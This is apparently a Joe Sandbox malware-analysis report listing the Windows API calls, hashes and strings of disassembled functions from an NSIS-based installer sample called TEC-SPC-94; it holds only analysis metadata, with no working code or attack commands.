                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2531174081-0
                                                          • Opcode ID: 3b277214ccb200348dce810b6065f154b0d7733336d6f52acf236ebd4cfd95e9
                                                          • Instruction ID: 09d17c59ce7287a2cbf3dc662f19c44123261f726eb293d34c68041fb2ac0666
                                                          • Opcode Fuzzy Hash: 3b277214ccb200348dce810b6065f154b0d7733336d6f52acf236ebd4cfd95e9
                                                          • Instruction Fuzzy Hash: CA21A131900558BBCB219FA5DD849DFBFB8EF54310F14807AF904B62A0C3798A81CFA8
                                                          APIs
                                                          • DestroyWindow.USER32(?,00000000), ref: 00402D35
                                                          • GetTickCount.KERNEL32 ref: 00402D53
                                                          • wsprintfW.USER32 ref: 00402D81
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                            • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                            • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                            • Part of subcall function 00402CFE: MulDiv.KERNEL32(?,00000064,?), ref: 00402D13
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                          • String ID: ... %d%%
                                                          • API String ID: 722711167-2449383134
                                                          • Opcode ID: ecca89fa2e5f998eed3815419d4b4a2aa167a0d5ca2c6de3075ca18f1a733700
                                                          • Instruction ID: 6ab1becf65089363c82906b09123353a2bcc309babf83807567d4fce196db36a
                                                          • Opcode Fuzzy Hash: ecca89fa2e5f998eed3815419d4b4a2aa167a0d5ca2c6de3075ca18f1a733700
                                                          • Instruction Fuzzy Hash: CD015E31909220EBC7616B64EE5DBDB3A68AB00704B14457BF905B11F1C6B85C45CFAE
                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404AD7
                                                          • GetMessagePos.USER32 ref: 00404ADF
                                                          • ScreenToClient.USER32(?,?), ref: 00404AF9
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404B0B
                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404B31
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                          • Instruction ID: 0eecd9b69481b59551465bcf9db52b38cf56a1a0cd5b93a9aa54e622b558eefa
                                                          • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                          • Instruction Fuzzy Hash: 4B015E71E00219BADB10DBA4DD85FFEBBBCAB94711F10012BBB10B61D0D7B4A9018BA5
                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                          • wsprintfW.USER32 ref: 00402CD1
                                                          • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                          • API String ID: 1451636040-1158693248
                                                          APIs
                                                          • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A67
                                                          • wsprintfW.USER32 ref: 00404A70
                                                          • SetDlgItemTextW.USER32(?,004226E8), ref: 00404A83
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s$&B
                                                          • API String ID: 3540041739-2907463167
                                                          APIs
                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 0040623F
                                                          • CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                          • CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 00406253
                                                          • CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 00406266
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: *?|<>/":
                                                          • API String ID: 589700163-165019052
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(?,?,0040A598,000000FF,00409D98,00000400,?,?,00000021), ref: 0040252F
                                                          • lstrlenA.KERNEL32(00409D98,?,?,0040A598,000000FF,00409D98,00000400,?,?,00000021), ref: 00402536
                                                          • WriteFile.KERNEL32(00000000,?,00409D98,00000000,?,?,00000000,00000011), ref: 00402568
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: ByteCharFileMultiWideWritelstrlen
                                                          • String ID: 8
                                                          • API String ID: 1453599865-4194326291
                                                          APIs
                                                          • lstrcatW.KERNEL32(00000000,00000000,00409598,00435000,?,?,00000031), ref: 00401793
                                                          • CompareFileTime.KERNEL32(-00000014,?,00409598,00409598,00000000,00000000,00409598,00435000,?,?,00000031), ref: 004017B8
                                                            • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                            • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                            • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID:
                                                          • API String ID: 1941528284-0
                                                          APIs
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Close$DeleteEnumOpen
                                                          • String ID:
                                                          • API String ID: 1912718029-0
                                                          APIs
                                                          • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                          • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                          • DeleteObject.GDI32(00000000), ref: 00401D36
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401D44
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                          • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                          • CreateFontIndirectW.GDI32(0040BDA0), ref: 00401DBC
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID:
                                                          • API String ID: 3808545654-0
                                                          APIs
                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00403192
                                                            • Part of subcall function 0040330F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                          • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                          • WriteFile.KERNEL32(0040BE90,?,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: File$Pointer$CountTickWrite
                                                          • String ID:
                                                          • API String ID: 2146148272-0
                                                          APIs
                                                          • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                          • lstrlenW.KERNEL32(0040A598,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                          • RegSetValueExW.ADVAPI32(?,?,?,?,0040A598,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                          • RegCloseKey.ADVAPI32(?,?,?,0040A598,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateValuelstrlen
                                                          • String ID:
                                                          • API String ID: 1356686001-0
                                                          APIs
                                                            • Part of subcall function 00405A3E: CharNextW.USER32(?,?,00424EF0,?,00405AB2,00424EF0,00424EF0,00436800,?,76232EE0,004057F0,?,00436800,76232EE0,00434000), ref: 00405A4C
                                                            • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A51
                                                            • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A69
                                                          • CreateDirectoryW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                          • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                          • GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                          • SetCurrentDirectoryW.KERNEL32(?,00435000,?,00000000,000000F0), ref: 00401630
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3502525981.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3502505553.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502545577.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502569261.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.3502598654.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                          • String ID:
                                                          • API String ID: 3751793516-0
                                                          APIs
                                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                          • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                          • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                            • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                          Similarity
                                                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                          • String ID:
                                                          • API String ID: 1404258612-0
                                                          APIs
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                            • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                            • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                            • Part of subcall function 004056C3: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                            • Part of subcall function 004056C3: CloseHandle.KERNEL32(?), ref: 004056F5
                                                          • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                          • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                          Similarity
                                                          • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 3585118688-0
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 00405195
                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004051E6
                                                            • Part of subcall function 004041E6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                          Strings
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00405C01
                                                          • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403358,00436000,00436800), ref: 00405C1C
                                                          Strings
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: nsa
                                                          • API String ID: 1716503409-2209301699
                                                          APIs
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                          • CloseHandle.KERNEL32(?), ref: 004056F5
                                                          Strings
                                                          • Error launching installer, xrefs: 004056D6
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: Error launching installer
                                                          • API String ID: 3712363035-66219284
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                          • lstrcmpiA.KERNEL32(00405D53,00000000), ref: 00405B41
                                                          • CharNextA.USER32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B52
                                                          • lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0